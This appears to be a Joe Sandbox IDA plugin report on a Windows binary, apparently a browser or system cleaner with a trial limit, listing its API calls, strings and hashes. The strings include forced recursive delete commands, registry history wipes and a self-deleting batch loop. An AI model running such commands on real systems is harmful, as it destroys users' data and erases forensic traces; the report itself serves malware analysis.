API String ID: 4080879615-0
Opcode ID: deeb7901bc9a1c9402ce5623d21999b15f3dcde8d64849d450898d991a24d1a0
Instruction ID: 1ff96bb8ef7605f0caa5a4dd8548b9a5efde3f4e5f2b52bc8e945bc090aef529
Opcode Fuzzy Hash: deeb7901bc9a1c9402ce5623d21999b15f3dcde8d64849d450898d991a24d1a0
Instruction Fuzzy Hash: 70318171500518EBCB109F64CC88AEF7B78EF4475AF0045AAF915D6251D7788D888F99

Function 00439D40 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 140fileCOMMON

Download Yara Rule

APIs

#17.COMCTL32(?,?,?,?,?,0046429C,000000FF), ref: 00439D71

Part of subcall function 0045FE1A: InterlockedExchange.KERNEL32(004D986C,?), ref: 0045FE46

__time32.LIBCMT ref: 00439D87

Part of subcall function 0044808D: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00448096
Part of subcall function 0044808D: __aulldiv.LIBCMT ref: 004480B6

Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF

FindFirstFileA.KERNEL32(?,?,SystemRoot,?,00000000,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,004C7468), ref: 00439E18

Strings

\system32\winbws.bat, xrefs: 00439DF4, 0043A2F3
SystemRoot, xrefs: 00439DBD
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00439DA1

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: FileTime$ErrorExchangeFindFirstInterlockedLastOpenSystem__aulldiv__time32
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SystemRoot$\system32\winbws.bat
API String ID: 3390870601-281878756
Opcode ID: bda4eec5377eeda0a82f4e272ea58311012ab99e9c2bf338f4d13e0b041c49af
Instruction ID: 6b44aab606d6ad69af96c057710d905d5c5d9310879aa73593c03cc9d95d0a52
Opcode Fuzzy Hash: bda4eec5377eeda0a82f4e272ea58311012ab99e9c2bf338f4d13e0b041c49af
Instruction Fuzzy Hash: E651C2751087419FC324EF25C895BDFB7A8AF88324F004A1FF45A432D2EB789519CB5A

Function 0045F814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43librarystringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(00000800,LOC), ref: 0045F837
LoadLibraryA.KERNEL32(?), ref: 0045F86A
GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 0045F87A

Strings

LOC, xrefs: 0045F831

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: InfoLibraryLoadLocalelstrcpy
String ID: LOC
API String ID: 864663389-519433814
Opcode ID: e6f3c999939144e02464b0b0fc0e2b59b0546a768625dfb11b6e071e05ce9b10
Instruction ID: ffcff24ee2f8decf076d347500f601e65b7776f307dd8f414f4772e04c55416e
Opcode Fuzzy Hash: e6f3c999939144e02464b0b0fc0e2b59b0546a768625dfb11b6e071e05ce9b10
Instruction Fuzzy Hash: 3F01A771500208ABDF14BB60EC09ADA37ACAB04365F408577FD19D6191E778DE4C8E9A

Function 0042E9F0 Relevance: 3.0, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0042EA10
GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0042EA40

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: AdaptersInfo
String ID:
API String ID: 3177971545-0
Opcode ID: 04afacd52e89466cf82da10b8b8be73c46f93b8a84a9b27f9a449f8cc33cebfb
Instruction ID: 4f22e88a5df2136267b61b20a62ceb5ab55facc037de5985a683b6d03b984736
Opcode Fuzzy Hash: 04afacd52e89466cf82da10b8b8be73c46f93b8a84a9b27f9a449f8cc33cebfb
Instruction Fuzzy Hash: 05F0AFF1A00311EBE7149F15D805B17B7E8EB84705F00892EF889CB241E378DD48CB91

Function 00458C58 Relevance: 1.9, APIs: 1, Instructions: 440COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00458C5D

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 64f7b6f75cea90bdd9947e7a34994e041742a05b1ea9121d2e1a6fcceb2a18e3
Instruction ID: 2afed94fbf52a9488442a8020d80419d6e69f24e400d4a6813f348e17fbd4380
Opcode Fuzzy Hash: 64f7b6f75cea90bdd9947e7a34994e041742a05b1ea9121d2e1a6fcceb2a18e3
Instruction Fuzzy Hash: 9AE17B70500215EBDB15DF15C885ABE77B9EF08316F10851AFC09AA293CB3DEE09DB69

Function 004057B0 Relevance: 110.5, APIs: 36, Strings: 27, Instructions: 292windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00404F00: _rand.LIBCMT ref: 00405041

Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1

SendMessageA.USER32(?,00000401,00000000,?), ref: 00405836
SendMessageA.USER32(?,00000402,00000000,00000000), ref: 00405848
SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00405859
ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit,00000000,00000000), ref: 00405888
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 0040589A
ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.gid && exit,00000000,00000000), ref: 004058B6
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 004058C8
ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.log & exit,00000000,00000000), ref: 004058E4
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 004058F6
ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.chk & exit,00000000,00000000), ref: 00405912
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405924
ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit,00000000,00000000), ref: 0040594D
SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), ref: 00405959

Part of subcall function 00405630: SHGetSpecialFolderPathA.SHELL32(00000000,00000008,00000008,00000000), ref: 00405650
Part of subcall function 00405630: SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs), ref: 00405674

SHDeleteValueA.SHLWAPI(80000001,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,DefaultUserName), ref: 00405971
SHDeleteValueA.SHLWAPI(80000001,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,AltDefaultUserName), ref: 00405986
SHDeleteValueA.SHLWAPI(80000002,Software\Microsoft\Windows\CurrentVersion\Winlogon,DefaultUserName), ref: 0040599B
SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU), ref: 004059AB
SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU), ref: 004059B7
SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU), ref: 004059C3
SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU), ref: 004059CF
SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ComputerNameMRU), ref: 004059DB
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 004059ED
ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %windir%\prefetch\*.* & exit,00000000,00000000), ref: 00405A0D
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405A1F
ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\recycled\*.* & exit,00000000,00000000), ref: 00405A3F
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405A51
ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit,00000000,00000000), ref: 00405A71
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405A91
ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit,00000000,00000000), ref: 00405AB5
SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\TypedURLs), ref: 00405AC8
SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\IntelliForms), ref: 00405ADB
SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\RAS Autodial\Addresses), ref: 00405AE7
SHEmptyRecycleBinA.SHELL32(00000000,00000000,00000007), ref: 00405AF6
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405B21
ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %windir%\$NtUninstal*.* & exit,00000000,00000000), ref: 00405B41
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405B53

Part of subcall function 00459905: ShowWindow.USER32(?,?,00455C74,00000000,0000E146,00000000,?,?,00402EB7), ref: 00459912

Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6

Strings

/k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit, xrefs: 00405AA4
/k del /f /s /q %systemdrive%\*.log & exit, xrefs: 004058D3
Software\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00405967, 0040597C
Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ComputerNameMRU, xrefs: 004059D1
/k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit, xrefs: 00405877
cmd.exe, xrefs: 0040587C, 004058AA, 004058D8, 00405906, 00405941, 00405A01, 00405A33, 00405A65, 00405AA9, 00405B35
Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, xrefs: 0040594F
Software\Microsoft\Windows\CurrentVersion\Winlogon, xrefs: 00405991
AltDefaultUserName, xrefs: 00405977
Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU, xrefs: 004059C5
Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU, xrefs: 004059AD
/k del /f /s /q %windir%\$NtUninstal*.* & exit, xrefs: 00405B30
Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU, xrefs: 004059B9
Information, xrefs: 00405B64
They have been cleaned successfully!, xrefs: 00405B69
/k del /f /s /q %systemdrive%\recycled\*.* & exit, xrefs: 00405A2E
/k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit, xrefs: 00405A60
/k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit, xrefs: 0040593C
Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU, xrefs: 004059A1
/k del /f /s /q %systemdrive%\*.gid && exit, xrefs: 004058A5
/k del /f /s /q %systemdrive%\*.chk & exit, xrefs: 00405901
/k del /f /s /q %windir%\prefetch\*.* & exit, xrefs: 004059FC
Software\Microsoft\RAS Autodial\Addresses, xrefs: 00405ADD
DefaultUserName, xrefs: 00405962, 0040598C
open, xrefs: 00405881, 004058AF, 004058DD, 0040590B, 00405946, 00405A06, 00405A38, 00405A6A, 00405AAE, 00405B3A
Software\Microsoft\Internet Explorer\TypedURLs, xrefs: 00405ABE
Software\Microsoft\Internet Explorer\IntelliForms, xrefs: 00405AD1

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Message$DeleteSend$ExecuteShell$Value$EmptyFolderH_prologPathRecycleShowSpecialWindow_rand
String ID: /k del /f /s /q %systemdrive%\*.chk & exit$/k del /f /s /q %systemdrive%\*.gid && exit$/k del /f /s /q %systemdrive%\*.log & exit$/k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit$/k del /f /s /q %systemdrive%\recycled\*.* & exit$/k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit$/k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit$/k del /f /s /q %windir%\$NtUninstal*.* & exit$/k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit$/k del /f /s /q %windir%\prefetch\*.* & exit$AltDefaultUserName$DefaultUserName$Information$Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ComputerNameMRU$Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU$Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU$Software\Microsoft\Internet Explorer\IntelliForms$Software\Microsoft\Internet Explorer\TypedURLs$Software\Microsoft\RAS Autodial\Addresses$Software\Microsoft\Windows NT\CurrentVersion\Winlogon$Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU$Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU$Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU$Software\Microsoft\Windows\CurrentVersion\Winlogon$They have been cleaned successfully!$cmd.exe$open
API String ID: 608165374-3242249910
Opcode ID: 9470b7cd3b11127832bb47f481f4ac34d4b82c993a343baa40c5a6d1fb0da4f5
Instruction ID: 7915b94816bc076585abd770ead6f12c8ee0623fdfc370f13a234b32de4c556b
Opcode Fuzzy Hash: 9470b7cd3b11127832bb47f481f4ac34d4b82c993a343baa40c5a6d1fb0da4f5
Instruction Fuzzy Hash: 4E914B703C0B00BAF6207B619C47F6B7294EB54F06F31492EB75A7A1C1E9F878458A5E

Function 00402E80 Relevance: 47.6, APIs: 17, Strings: 10, Instructions: 356windowregistryCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00402EB9

Part of subcall function 00446DDD: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00402EBE,00000000), ref: 00446DE6
Part of subcall function 00446DDD: __aulldiv.LIBCMT ref: 00446E06

Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF

Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1

Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF

SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00402F6D

Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E

SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00402F9D
SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00402FAF
SendMessageA.USER32(?,00000143,00000000,Internet Explorer 4.0), ref: 00402FC4
SendMessageA.USER32(?,00000143,00000000,Internet Explorer 5.0), ref: 00402FD9
SendMessageA.USER32(?,00000143,00000000,Internet Explorer 6.0), ref: 00402FEE
SendMessageA.USER32(?,00000143,00000000,Internet Explorer 7.0), ref: 00403003
SendMessageA.USER32(?,00000143,00000000,Internet Explorer 8.0), ref: 00403018
RegOpenKeyExA.KERNEL32 ref: 00403046
RegQueryValueExA.KERNEL32(?,Version,00000000,?,?,?), ref: 004030E7
RegCloseKey.KERNEL32(?,80000002,?,00000000,00020019,?,SOFTWARE\Microsoft\Internet Explorer), ref: 00403124
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00403166
SendMessageA.USER32(?,0000014E,00000001,00000000), ref: 00403193
SendMessageA.USER32(?,0000014E,00000002,00000000), ref: 004031C0
SendMessageA.USER32(?,0000014E,00000003,00000000), ref: 004031ED
SendMessageA.USER32(?,0000014E,00000004,00000000), ref: 0040321A

Strings

Internet Explorer 5.0, xrefs: 00402FCC
SOFTWARE\Microsoft\Internet Explorer\Registration, xrefs: 00402EC1
d, xrefs: 004030DF
Version, xrefs: 004030D9
SOFTWARE\Microsoft\Internet Explorer, xrefs: 0040301A
Internet Explorer 4.0, xrefs: 00402FB7
Internet Explorer 6.0, xrefs: 00402FE1
Internet Explorer 7.0, xrefs: 00402FF6
Internet Explorer 8.0, xrefs: 0040300B
ProductId, xrefs: 00402EDE

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: MessageSend$OpenTime$CallbackCloseDispatcherErrorFileH_prologItemLastQuerySystemUserValue__aulldiv__time64
String ID: Internet Explorer 4.0$Internet Explorer 5.0$Internet Explorer 6.0$Internet Explorer 7.0$Internet Explorer 8.0$ProductId$SOFTWARE\Microsoft\Internet Explorer$SOFTWARE\Microsoft\Internet Explorer\Registration$Version$d
API String ID: 3070450969-2079231466
Opcode ID: 46547f3797a4cde3ff040432e23ae9be5653e7e1b86516a1e286e490f84f3ad3
Instruction ID: 12bbc5be726f8242eba0e1541a654c64904454683ae404ff7ef7c215fd5e6504
Opcode Fuzzy Hash: 46547f3797a4cde3ff040432e23ae9be5653e7e1b86516a1e286e490f84f3ad3
Instruction Fuzzy Hash: 94D1C670204741AFE310DB28CC86F9BB7A8BF84724F108A1DF6599B2D1DB78D505CB9A

Function 0045F8A9 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0045F8CC
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0045F8D7
ConvertDefaultLocale.KERNEL32(?), ref: 0045F908
ConvertDefaultLocale.KERNEL32(?), ref: 0045F910
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0045F91D
ConvertDefaultLocale.KERNEL32(?), ref: 0045F937
ConvertDefaultLocale.KERNEL32(000003FF), ref: 0045F93D
GetVersion.KERNEL32 ref: 0045F94B
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 0045F970
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0045F996
ConvertDefaultLocale.KERNEL32(?), ref: 0045F9E2
ConvertDefaultLocale.KERNEL32(76F90A60), ref: 0045F9E8
RegCloseKey.ADVAPI32(?), ref: 0045F9F3

Strings

GetSystemDefaultUILanguage, xrefs: 0045F912
Control Panel\Desktop\ResourceLocale, xrefs: 0045F963
ntdll.dll, xrefs: 0045F9FB
kernel32.dll, xrefs: 0045F8BF
GetUserDefaultUILanguage, xrefs: 0045F8CE

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 780041395-483790700
Opcode ID: 47d7d82368e40fe238e9fa7ef71f2118e8ce315a6da71a88ea93bf2d1b1e8eff
Instruction ID: 8cf04242b056ed2888822f3ee261883fc83cb0ac3b597c26b6eb5f4152f102d6
Opcode Fuzzy Hash: 47d7d82368e40fe238e9fa7ef71f2118e8ce315a6da71a88ea93bf2d1b1e8eff
Instruction Fuzzy Hash: 715186B1E40219AEDF109FE5DC89BBFBBB8EB44315F10003BE905E3251D67C99448BA5

Function 00439E56 Relevance: 37.1, APIs: 4, Strings: 17, Instructions: 311fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00455F5B: __EH_prolog.LIBCMT ref: 00455F60
Part of subcall function 00455F5B: FindResourceA.KERNEL32(?,00000000,00000005), ref: 00455F98
Part of subcall function 00455F5B: LoadResource.KERNEL32(?,00000000), ref: 00455FA0
Part of subcall function 00455F5B: LockResource.KERNEL32(00000000), ref: 00455FB2

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00439E9D
CopyFileA.KERNEL32(?,?), ref: 00439EF1
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0043A20D

Part of subcall function 0045A8A7: __EH_prolog.LIBCMT ref: 0045A8AC

DeleteFileA.KERNEL32(?), ref: 0043A26B

Strings

del , xrefs: 0043A0E8
", xrefs: 00439FA5
@echo off, xrefs: 00439F75
:loop, xrefs: 00439F83
\system32\winsys.ini ", xrefs: 0043A059
if exist ", xrefs: 00439FF6
start " " ", xrefs: 0043A144
\system32\winsys.ini, xrefs: 00439ED5, 0043A255
del ", xrefs: 00439F9A
" goto loop, xrefs: 0043A001
\system32\winsys.ini , xrefs: 0043A0F3
\system32\winbws.bat, xrefs: 00439F2E, 0043A1EA
open, xrefs: 0043A206
There are %d times remain to try!, xrefs: 0043A1C6
copy , xrefs: 0043A04A
exit, xrefs: 0043A197
There are no times remain to try, you must sign to use it!, xrefs: 0043A27C

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
